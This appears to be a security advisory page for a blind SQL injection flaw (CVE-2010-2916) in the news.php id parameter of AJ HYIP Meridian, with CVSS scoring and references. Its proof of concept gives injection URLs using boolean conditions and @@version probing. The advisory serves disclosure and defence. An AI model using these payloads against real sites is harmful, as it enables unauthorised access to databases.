AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability

2010-08-02 / 2010-08-03
Credit: Jose Luis Gongora Fernandez
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-2916
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability bug found by Jose Luis Gongora Fernandez (a.k.a) JosS contact: sys-project[at]hotmail.com website: http://www.hack0wn.com/ - site: http://www.ajsquare.com/products/ajhyip/index.php - about AJ HYIP: AJ HYIP is a complete financial tool with no technical knowledge required to manage the site. AJ HYIP software is the latest and most advanced HYIP Script with excellent navigation features. Our HYIP Script can be easily customized to accustom your needs with a potential to generate heavy revenues. ~ [POC] http://target/path/news.php?id=1 [bSQL] http://target/path/news.php?id=1 and 1=1 http://target/path/news.php?id=1 and 1=2 ~ [DEMO] http://server/meridian/news.php?id=1 and substring(@@version,1,1)=4 http://server/meridian/news.php?id=1 and substring(@@version,1,1)=5 __h0__

References:

http://xforce.iss.net/xforce/xfdb/60590
http://www.exploit-db.com/exploits/14436
http://packetstormsecurity.org/1007-exploits/ajhyipmeridian-sql.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top